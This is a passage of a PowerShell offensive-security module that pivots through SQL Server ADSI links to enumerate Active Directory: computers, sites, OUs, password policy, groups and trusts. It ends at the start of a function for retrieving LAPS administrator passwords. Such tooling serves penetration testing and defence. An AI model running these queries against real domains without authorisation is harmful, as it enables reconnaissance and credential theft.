adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } } Process { # Get the domain of the server $Domain = Get-SQLServerInfo -SuppressVerbose -Instance $Instance -Username $Username -Password $Password | Select-Object DomainName -ExpandProperty DomainName $DomainDistinguishedName = Get-SQLDomainObject -SuppressVerbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath "$Domain" -LdapFilter "(name=$Domain)" -LdapFields 'distinguishedname' -UseAdHoc | Select-Object distinguishedname -ExpandProperty distinguishedname # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=subnet)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,siteobject,whencreated,whenchanged,location' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=subnet)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,siteobject,whencreated,whenchanged,location' } } End { } } # ---------------------------------- # Get-SQLDomainSite # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainSite { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain sites via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } } Process { # Get the domain of the server $Domain = Get-SQLServerInfo -SuppressVerbose -Instance $Instance -Username $Username -Password $Password | Select-Object DomainName -ExpandProperty DomainName $DomainDistinguishedName = Get-SQLDomainObject -SuppressVerbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath "$Domain" -LdapFilter "(name=$Domain)" -LdapFields 'distinguishedname' -UseAdHoc | Select-Object distinguishedname -ExpandProperty distinguishedname # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=site)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,whencreated,whenchanged' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=site)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,whencreated,whenchanged' } } End { } } # ---------------------------------- # Get-SQLDomainComputer # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainComputer { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain computers via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FilterComputer Domain computer to filter for. .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain computer to filter for.')] [string]$FilterComputer, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup computer filter if((-not $FilterComputer)){ $FilterComputer = '*' } } Process { # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=Computer)(SamAccountName=$FilterComputer))" -LdapFields 'samaccountname,dnshostname,operatingsystem,operatingsystemversion,operatingSystemServicePack,whencreated,whenchanged,adspath' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectCategory=Computer)(SamAccountName=$FilterComputer))" -LdapFields 'samaccountname,dnshostname,operatingsystem,operatingsystemversion,operatingSystemServicePack,whencreated,whenchanged,adspath' } } End { } } # ---------------------------------- # Get-SQLDomainOu # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDomainOu { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain organization units (ou) via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainOu -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } } Process { # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter '(objectCategory=organizationalUnit)' -LdapFields 'name,distinguishedname,adspath,instancetype,whencreated,whenchanged' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter '(objectCategory=organizationalUnit)' -LdapFields 'name,distinguishedname,adspath,instancetype,whencreated,whenchanged' } } End { } } # ---------------------------------- # Get-SQLDomainAccountPolicy # ---------------------------------- # Author: Scott Sutherland, Thomas Elling # Reference: https://msdn.microsoft.com/en-us/library/ms682204(v=vs.85).aspx Function Get-SQLDomainAccountPolicy { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain account policies via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainAccountPolicy -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Create table for results $TableAccountPolicy = New-Object System.Data.DataTable $TableAccountPolicy.Columns.Add("pwdhistorylength") | Out-Null $TableAccountPolicy.Columns.Add("lockoutthreshold") | Out-Null $TableAccountPolicy.Columns.Add("lockoutduration") | Out-Null $TableAccountPolicy.Columns.Add("lockoutobservationwindow") | Out-Null $TableAccountPolicy.Columns.Add("minpwdlength") | Out-Null $TableAccountPolicy.Columns.Add("minpwdage") | Out-Null $TableAccountPolicy.Columns.Add("pwdproperties") | Out-Null $TableAccountPolicy.Columns.Add("whenchanged") | Out-Null $TableAccountPolicy.Columns.Add("gplink") | Out-Null } Process { # Call Get-SQLDomainObject if($UseAdHoc){ $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter '(objectClass=domainDNS)' -LdapFields 'pwdhistorylength,lockoutthreshold,lockoutduration,lockoutobservationwindow,minpwdlength,minpwdage,pwdproperties,whenchanged,gplink' -UseAdHoc }else{ $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter '(objectClass=domainDNS)' -LdapFields 'pwdhistorylength,lockoutthreshold,lockoutduration,lockoutobservationwindow,minpwdlength,minpwdage,pwdproperties,whenchanged,gplink' } $Results | ForEach-Object { # Add results to table $TableAccountPolicy.Rows.Add( $_.pwdHistoryLength, $_.lockoutThreshold, [string]([string]$_.lockoutDuration -replace '-','') / (60 * 10000000), [string]([string]$_.lockOutObservationWindow -replace '-','') / (60 * 10000000), $_.minPwdLength, [string][Math]::Floor([decimal](((([string]$_.minPwdAge -replace '-','') / (60 * 10000000)/60))/24)), [string]$_.pwdProperties, [string]$_.whenChanged, [string]$_.gPLink ) | Out-Null } $TableAccountPolicy } End { } } # ---------------------------------- # Get-SQLDomainGroup # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainGroup { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain groups via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FilterGroup Domain group to filter for. .EXAMPLE PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainGroup -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainGroup -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Domain group to filter for.')] [string]$FilterGroup, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup group filter if((-not $FilterGroup)){ $FilterGroup = '*' } } Process { # Call Get-SQLDomainObject if($UseAdHoc){ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectClass=Group)(SamAccountName=$FilterGroup))" -LdapFields 'samaccountname,adminCount,whencreated,whenchanged,adspath' -UseAdHoc }else{ Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(&(objectClass=Group)(SamAccountName=$FilterGroup))" -LdapFields 'samaccountname,adminCount,whencreated,whenchanged,adspath' } } End { } } # ---------------------------------- # Get-SQLDomainTrust # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainTrust { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain trusts via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainTrust -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainTrust -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkPassword, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] [Switch]$UseAdHoc, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } $TblTrusts = New-Object System.Data.DataTable $TblTrusts.Columns.Add("TrustedDomain") | Out-Null $TblTrusts.Columns.Add("TrustedDomainDn") | Out-Null $TblTrusts.Columns.Add("Trusttype") | Out-Null $TblTrusts.Columns.Add("Trustdirection") | Out-Null $TblTrusts.Columns.Add("Trustattributes") | Out-Null $TblTrusts.Columns.Add("Whencreated") | Out-Null $TblTrusts.Columns.Add("Whenchanged") | Out-Null $TblTrusts.Columns.Add("Objectclass") | Out-Null $TblTrusts.Clear() } Process { # Call Get-SQLDomainObject if($UseAdHoc){ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectClass=trustedDomain)" -LdapFields 'trustpartner,distinguishedname,trusttype,trustdirection,trustattributes,whencreated,whenchanged,adspath' -UseAdHoc }else{ $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectClass=trustedDomain)" -LdapFields 'trustpartner,distinguishedname,trusttype,trustdirection,trustattributes,whencreated,whenchanged,adspath' } $Result | ForEach-Object { # Resolve trust direction $TrustDirection = Switch ($_.trustdirection) { 0 { "Disabled" } 1 { "Inbound" } 2 { "Outbound" } 3 { "Bidirectional" } } # Resolve trust attribute $TrustAttrib = Switch ($_.trustattributes){ 0x001 { "non_transitive" } 0x002 { "uplevel_only" } 0x004 { "quarantined_domain" } 0x008 { "forest_transitive" } 0x010 { "cross_organization" } 0x020 { "within_forest" } 0x040 { "treat_as_external" } 0x080 { "trust_uses_rc4_encryption" } 0x100 { "trust_uses_aes_keys" } Default { $_.trustattributes } } # Resolve trust type # Reference: https://support.microsoft.com/en-us/kb/228477 $TrustType = Switch ($_.trusttype){ 1 {"Downlevel Trust (Windows NT domain external)"} 2 {"Uplevel Trust (Active Directory domain - parent-child, root domain, shortcut, external, or forest)"} 3 {"MIT (non-Windows Kerberos version 5 realm)"} 4 {"DCE (Theoretical trust type - DCE refers to Open Group's Distributed Computing)"} } # Add trust to table $TblTrusts.Rows.Add( [string]$_.trustpartner, [string]$_.distinguishedname, [string]$TrustType, [string]$TrustDirection, [string]$TrustAttrib, [string]$_.whencreated, [string]$_.whenchanged, [string]$_.objectclass ) | Out-Null } $TblTrusts } End { } } # ---------------------------------- # Get-SQLDomainPasswordsLAPS # ---------------------------------- # Author: Scott Sutherland, Thomas Elling Function Get-SQLDomainPasswordsLAPS { <# .SYNOPSIS Using the OLE DB ADSI provider, query Active Directory for a list of domain LAPS passwords via the domain logon server associated with the SQL Server. This can be done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER LinkUsername Domain account used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER LinkPassword Domain account password used to authenticate to LDAP through SQL Server ADSI link. .PARAMETER UseAdHoc Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose .EXAMPLE PS C:\> Get-SQLDomainPasswordsLAPS -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDomainPasswordsLAPS -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] [string]$LinkUsername, [Parameter(Mandatory = $false, HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server 